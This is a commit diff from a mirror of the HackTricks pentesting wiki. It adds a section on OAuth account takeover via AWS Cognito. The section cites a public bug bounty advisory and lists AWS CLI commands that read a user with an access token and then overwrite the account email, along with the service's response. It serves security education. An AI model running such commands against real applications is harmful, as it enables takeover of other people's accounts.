mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 12:43:23 +00:00
GitBook: [#2927] No subject
This commit is contained in:
parent
8b28167db2
commit
e10010e9f4
1 changed files with 21 additions and 0 deletions
|
@ -155,6 +155,27 @@ The **authorization code should live just for some time to limit the time window
|
||||||
|
|
||||||
If you can get the **authorization code and use it with a different client then you can takeover other accounts**.
|
If you can get the **authorization code and use it with a different client then you can takeover other accounts**.
|
||||||
|
|
||||||
|
### AWS Cognito <a href="#bda5" id="bda5"></a>
|
||||||
|
|
||||||
|
In this bug bounty report: [**https://security.lauritz-holtmann.de/advisories/flickr-account-takeover/**](https://security.lauritz-holtmann.de/advisories/flickr-account-takeover/) **** you can see that the **token** that **AWS Cognito** gives back to the user might have **enough permissions to overwrite the user data**. Therefore, if you can **change the user email for a different user email**, you might be able to **take over** others accounts.
|
||||||
|
|
||||||
|
```
|
||||||
|
# Read info of the user
|
||||||
|
aws cognito-idp get-user --region us-east-1 --access-token eyJraWQiOiJPVj[...]
|
||||||
|
|
||||||
|
# Change email address
|
||||||
|
aws cognito-idp update-user-attributes --region us-east-1 --access-token eyJraWQ[...] --user-attributes Name=email,Value=imaginary@flickr.com
|
||||||
|
{
|
||||||
|
"CodeDeliveryDetailsList": [
|
||||||
|
{
|
||||||
|
"Destination": "i***@f***.com",
|
||||||
|
"DeliveryMedium": "EMAIL",
|
||||||
|
"AttributeName": "email"
|
||||||
|
}
|
||||||
|
]
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
### SSRFs parameters <a href="#bda5" id="bda5"></a>
|
### SSRFs parameters <a href="#bda5" id="bda5"></a>
|
||||||
|
|
||||||
One of the hidden URLs that you may miss is the **Dynamic Client Registration endpoint**. In order to successfully authenticate users, OAuth servers need to know details about the client application, such as the "client\_name", "client\_secret", "redirect\_uris", and so on. These details can be provided via local configuration, but OAuth authorization servers may also have a **special registration endpoint**. This endpoint is normally mapped to "/register" and accepts POST requests with the following format:
|
One of the hidden URLs that you may miss is the **Dynamic Client Registration endpoint**. In order to successfully authenticate users, OAuth servers need to know details about the client application, such as the "client\_name", "client\_secret", "redirect\_uris", and so on. These details can be provided via local configuration, but OAuth authorization servers may also have a **special registration endpoint**. This endpoint is normally mapped to "/register" and accepts POST requests with the following format:
|
||||||
|
|
Loading…
Reference in a new issue